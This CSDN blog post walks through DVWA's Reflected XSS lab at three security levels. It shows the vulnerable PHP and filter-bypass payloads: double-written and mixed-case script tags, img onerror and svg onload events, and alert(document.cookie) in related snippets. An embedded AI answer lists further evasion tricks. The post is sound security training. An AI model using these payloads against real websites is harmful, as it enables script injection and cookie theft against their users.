DVWA-Reflected XSS

最新推荐文章于 2024-04-11 09:27:13 发布
最新推荐文章于 2024-04-11 09:27:13 发布
阅读量339 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wst0717/article/details/102727970
本文详细分析了三种不同级别的反射型XSS漏洞,包括代码结构、防护机制及绕过方法,如双写绕过、大小写混淆绕过,并探讨了在高难度级别下如何利用img标签事件触发XSS攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

Reflected XSS Source(Low)

vulnerabilities/xss_r/source/low.php

代码分析

<?php 

header ("X-XSS-Protection: 0"); 

// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
    // Feedback for end user 
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; 
} 

?>

$_GET[ ‘name’ ]无任何过滤

漏洞利用

输入,成功弹框:
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28233%29%3C%2Fscript%3E在这里插入图片描述

Reflected XSS(Medium)

代码分析

<?php 

header ("X-XSS-Protection: 0"); 

// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
    // Get input 
    $name = str_replace( '<script>', '', $_GET[ 'name' ] ); 

    // Feedback for end user 
    echo "<pre>Hello ${name}</pre>"; 
} 

?>

可以看到,这里对输入进行了过滤,基于黑名单的思想,使用str_replace函数将
输入中的<script>删除,这种防护机制是可以被轻松绕过的。

漏洞利用

双写绕过

输入<sc<script>ript>alert(233)</script>,成功弹框:
在这里插入图片描述

大小写混淆绕过

输入<ScRipt>alert(233)</script>,成功弹框:
在这里插入图片描述

Reflected XSS(High)

代码分析

<?php 

header ("X-XSS-Protection: 0"); 

// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
    // Get input 
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 

    // Feedback for end user 
    echo "<pre>Hello ${name}</pre>"; 
} 

?>

$name = preg_replace( ‘/<(.)s(.)c(.)r(.)i(.)p(.)t/i’
使用黑名单过滤输入,preg_replace()函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。

漏洞利用

虽然无法使用<script>标签注入XSS代码,但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。
输入<img src=1 onerror=alert(/233/)>,成功弹框:
在这里插入图片描述

DVWA-XSSReflected)Low Medium High低中高级别_dvwa靶场xss reflected 中级(1)
2401_84281748的博客
05-07 324
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DVWA-XSSReflected)Low Medium High低中高级别_dvwa靶场xss reflected 中级
2401_84281748的博客
05-07 350
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DVWAXSS (Reflected)
weixin_42075643的博客
02-07 791
low level view-source: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre&g
DVWA-XSS(Reflected)
weixin_44866139的博客
01-31 696
Low 1、查看服务器端源代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '&l...
DVWA-XSS(Reflected) 全级别教程
weixin_44716769的博客
09-08 855
XSS(Reflected) Low等级 查看源码 可以看到,代码直接引用了name参数,并没有任何的过滤与检查,存在明显的XSS漏洞。 输入,成功弹框 获取cookie ,弹窗成功 Medium等级 查看源码 使用str_replace函数将输入中的利用双写绕过 <sc,成功弹框 获取cookie <sc,成功弹框 大小写混淆绕过 ,成功弹框 获取cookie ,成功弹框 High等级 查看源码 preg_replace() 函数用于正则表达式的搜索和替换,这使得双
二、详解 DVWA_Reflected反射型XSS
在下小黄的博客
05-23 1231
第二篇、详解 DVWA_Reflected反射型XSS
dvwa详解_DVWA(六):XSS-Reflected 反射型XSS全等级详解
weixin_42234804的博客
01-26 552
XSS 概念:由于web应用程序对用户的输入过滤不严,通过html注入篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS类型:Reflected(反射型):只是简单的把用户输入的数据反射给浏览器,需要诱导用户点击一个恶意链接才能攻击成功。存储型:将用户输入的数据存储在服务器端,每次用户访问都会被执行js脚本DOM型:文本对象模式xss,通过修改页面的DOM节点形成的XS...
DVWA -XSSReflected-通关教程-完结
刘箫-技术库
04-11 2677
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。​ 与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA - XSS Reflected(medium)
qq_42630215的博客
06-09 311
输入常规的payload <script>alert(document.cookie)</script> script标签应该是被过滤了 方法一 大写绕过 <SCRIPT>alert(document.cookie)</SCRIPT> 执行成功 方法二 双写绕过 <sc<script>ript>alert('xss')</script> 方法三 其他标签 在这里插入代码片 img标签: <img src=1
DVWA -XSS(Stored)-通关教程-完结
刘箫-技术库
04-11 3460
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA 通关XSSReflected
干铮的博客
08-01 519
反射型XSS 非持久性,参数型的跨站脚本 反射型XSS的代码在Web应用参数中,例如搜索框的反射型XSS 注意到,反射型XSS代码出现在keyword参数中 Low 因为没有做任何过滤所以直接用弹窗代码 <script>alert(/xss/)</script> Medium 中级难度对<script>标签做了过滤,可以使用事件绕过 <img src="" onerror=alert(/xss/)> High 高难度是用preg_
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
DVWAXSSReflected)反射型XSS
RexHa的博客
10-07 2483
dvwa 反射型XSS
DVWAReflected XSS(反射型XSS)
谢公子的博客
10-04 7708
目录 Low Medium High Impossible Low 源代码: &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) { // Feedb...
反射型XSS(Reflected)DVWA全等级绕过方法
11-30 4349
本站所有文章均为原创,欢迎转载,请注明文章出处[https://blog.youkuaiyun.com/weixin_43847838/article/details/110358618](https://blog.youkuaiyun.com/weixin_43847838/article/details/110358618).。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
DVWA的使用5–XSSReflected)(反射型跨站脚本)
StoriesWine
03-27 1634
DVWA的使用5–XSSReflected)(反射型跨站脚本) xss 中文名是“跨站脚本攻击”,英文名“Cross Site Scripting”。 xss也是一种注入攻击,当web应用对用户输入过滤不严格,攻击者写入恶意的脚本代码(HTML、JavaScript)到网页中时,如果用户访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击。 1).low级别 源码: ...
DVWA - XSS (Reflected) (low, medium, high)
无节操
01-06 1875
low无验证,直接注入<script>alert(document.cookie)</script>medium查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写<Script>alert(document.cookie)</script>high查看源码,可发现用正则过滤了$name
DVWA-Xss(reflected)(反射型跨站脚本攻击)
简简的博客
02-02 1823
本系列文集:DVWA学习笔记 反射型Xss &amp;amp;amp;lt;全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。&amp;amp;amp;gt; xss攻击思路 ##Low: 点击右下角的view source,查看源码 分析: arrary_key_exists()函数:判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值...
dvwa-xss攻击无法弹窗
最新发布
03-18
<think>好的,我现在要解决用户在DVWA中进行XSS攻击时无法弹窗的问题。首先,我需要回忆一下DVWA的基本设置。DVWA(Damn Vulnerable Web Application)是一个用于安全测试的环境,用户通常会在不同的安全级别下进行练习,比如Low、Medium、High。XSS攻击弹窗不出现,可能有多种原因。 首先,用户可能是在较高的安全级别下进行测试。比如,在Medium或High级别下,DVWA会有一些防护措施,比如过滤<script>标签或对输入进行转义。这时候,我需要检查当前的安全级别,并建议用户将其调至Low级别进行测试。 其次,输入的payload可能被过滤或处理了。例如,在Medium级别中,可能会使用str_replace函数替换<script>标签。这时候,用户需要尝试其他标签,比如<img src=x onerror=alert(1)>,或者使用大小写混淆绕过过滤,比如<ScRiPt>alert(1)</ScRiPt>。 另外,浏览器的安全机制也可能阻止弹窗。比如,现代浏览器对反射型XSS可能会有内置的保护措施,特别是如果URL中包含alert()这类常见函数。这时候,可以尝试换用其他函数,比如prompt()或confirm(),或者使用编码绕过,比如将alert(1)转换成String.fromCharCode(97,108,101,114,116,40,49,41)然后通过eval执行。 还需要检查是否有输入长度限制。某些情况下,DVWA的输入字段可能有长度限制,导致payload被截断。这时候,可以尝试缩短payload,或者通过浏览器开发者工具移除输入框的maxlength属性。 此外,确保用户是在正确的模块下测试。DVWA中有反射型XSSReflected)和存储型XSS(Stored),如果用户在错误的模块输入payload,也可能无法触发弹窗。需要确认用户是否在正确的页面提交payload。 最后,可能需要查看服务器端的代码,了解具体的过滤机制。例如,在High级别的DVWA中,可能会使用正则表达式彻底过滤脚本标签,这时候需要更高级的绕过技巧,比如事件处理程序或使用其他HTML元素。 总结下来,可能的解决步骤包括:检查安全级别、尝试不同payload、绕过浏览器保护、处理输入限制、确认测试模块,以及分析服务器端过滤逻辑。接下来需要将这些步骤整理成用户友好的解答,并提供具体的示例和引用相关知识点。</think>### DVWAXSS攻击无法弹窗的解决方法 在DVWA中遇到XSS攻击无法弹窗的问题,通常与安全级别设置、输入过滤或浏览器防护机制有关。以下是逐步排查和解决的方法: --- #### **1. 确认DVWA安全级别** DVWA的安全级别(Low/Medium/High)直接影响XSS漏洞的利用难度: - **Low级别**:无防护,直接使用`<script>alert(1)</script>`即可弹窗。 - **Medium/High级别**:可能过滤`<script>`标签或转义特殊字符[^1]。 **操作步骤**: 1. 登录DVWA,点击左侧`DVWA Security`。 2. 将安全级别调整为**Low**后重试。 --- #### **2. 尝试绕过过滤的Payload** 若安全级别为Medium或High,需使用绕过技巧: - **Medium级别**:过滤`<script>`标签,但未处理大小写或事件属性。 ```html <!-- 使用大小写混淆 --> <ScRiPt>alert(1)</ScRiPt> <!-- 使用HTML事件属性 --> <img src=x onerror=alert(1)> ``` - **High级别**:可能彻底过滤脚本标签,需利用其他方式: ```html <!-- 使用伪协议或编码绕过 --> <a href="javascript:alert(1)">Click</a> <svg onload=alert(1)> ``` --- #### **3. 检查浏览器防护机制** 现代浏览器(如Chrome)可能拦截反射型XSS弹窗: - **解决方法**: 1. 改用`prompt()`或`confirm()`代替`alert()`: ```html <script>prompt(1)</script> ``` 2. 使用编码绕过检测: ```html <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script> ``` 3. 更换浏览器(如Firefox)测试。 --- #### **4. 处理输入长度限制** 某些DVWA输入字段(如存储型XSS)有长度限制: - **操作步骤**: 1. 打开浏览器开发者工具(F12)。 2. 找到输入框,删除`maxlength`属性后提交长payload。 --- #### **5. 确认测试的XSS类型** DVWA包含两种XSS模块: - **反射型XSSReflected)**:Payload直接显示在URL中,需通过输入框提交。 - **存储型XSS(Stored)**:Payload需提交到数据库(如留言板),刷新页面后触发。 **示例**(存储型XSS): ```html <textarea><svg onload=alert(1)></textarea> ``` --- #### **6. 查看服务器端过滤逻辑** 分析DVWA源码(以反射型XSS为例): - **Low级别**:无过滤: ```php <?php echo $_GET['name']; // 直接输出输入内容 ?> ``` - **Medium级别**:部分过滤: ```php <?php $name = str_replace('<script>', '', $_GET['name']); // 替换<script>标签 echo $name; ?> ``` - **High级别**:严格过滤: ```php <?php $name = preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET['name']); // 正则过滤 echo $name; ?> ``` --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值